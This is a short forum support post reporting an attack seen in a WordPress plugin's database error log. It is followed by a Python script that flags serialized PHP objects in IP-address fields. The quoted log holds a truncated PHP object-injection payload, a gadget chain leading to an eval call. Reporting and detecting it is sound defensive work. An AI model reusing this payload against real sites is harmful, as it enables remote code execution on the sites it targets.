SQL injection vulnerability
Our php error log shows some kind of SQL injection vulnerability.
“[25-Oct-2017 07:56:15 UTC] WordPress database error Illegal mix of collations (utf8_general_ci,IMPLICIT) and (utf8mb4_unicode_ci,COERCIBLE) for operation ‘=’ for query SELECT COUNT(hit_id) AS ct FROM ahc_hits WHERE DATE(hit_date) = DATE(NOW()) AND hit_ip_address = ‘}__test|O:21:\\\”JDatabaseDriverMysqli\\\”:3:{s:2:\\\”fc\\\”;O:17:\\\”JSimplepieFactory\\\”:0:{}s:21:\\\”\\\\0\\\\0\\\\0disconnectHandlers\\\”;a:1:{i:0;a:2:{i:0;O:9:\\\”SimplePie\\\”:5:{s:8:\\\”sanitize\\\”;O:20:\\\”JDatabaseDriverMysql\\\”:0:{}s:8:\\\”feed_url\\\”;s:6448:\\\”eval(bas …”
I truncated the error.
You can see here that they’ve somehow replaced the ‘hit ip address’ variable with code.
Can you fix this asap?
Thanks!
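A log-triage sketch for entries like the one quoted above, added here as an example (it is not part of the original post or of the plugin's code): it scans `WordPress database error` lines and flags quoted values that sit in an IP-named column but are not IP addresses, or that carry a serialized PHP object header. The sample lines are constructed from the post's entry with the payload shortened; the function names and the column-name heuristic are assumptions.

```python
import ipaddress
import re

# Constructed sample: the post's log entry with the payload shortened and
# straight quotes, plus one benign error line for contrast.
SAMPLE_LOG = [
    "[25-Oct-2017 07:56:15 UTC] WordPress database error Illegal mix of "
    "collations (utf8_general_ci,IMPLICIT) and (utf8mb4_unicode_ci,COERCIBLE) "
    "for operation '=' for query SELECT COUNT(hit_id) AS ct FROM ahc_hits "
    "WHERE DATE(hit_date) = DATE(NOW()) AND hit_ip_address = "
    "'}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";'",
    "[25-Oct-2017 08:01:02 UTC] WordPress database error Deadlock found when "
    "trying to get lock; try restarting transaction for query SELECT COUNT(hit_id) "
    "AS ct FROM ahc_hits WHERE hit_ip_address = '203.0.113.7'",
]

ENTRY = re.compile(r"^\[(?P<ts>[^\]]+)\] WordPress database error .*? for query (?P<query>.*)$")
LITERAL = re.compile(r"(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'")   # column = 'value'
IP_COLUMN = re.compile(r"(?:^|_)ip(?:_|$)")                 # heuristic (assumption)
PHP_OBJECT = re.compile(r'O:\d+:\\*"[A-Za-z_]')             # serialize() object header

def is_ip(value):
    """True if value parses as an IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def suspicious_entries(lines):
    """Return (timestamp, column, reasons) for each flagged quoted value."""
    findings = []
    for line in lines:
        entry = ENTRY.match(line)
        if not entry:
            continue
        for column, value in LITERAL.findall(entry["query"]):
            reasons = []
            if IP_COLUMN.search(column) and not is_ip(value):
                reasons.append("not an IP address")
            if PHP_OBJECT.search(value):
                reasons.append("serialized PHP object")
            if reasons:
                findings.append((entry["ts"], column, reasons))
    return findings

if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_LOG):
        print(finding)
```
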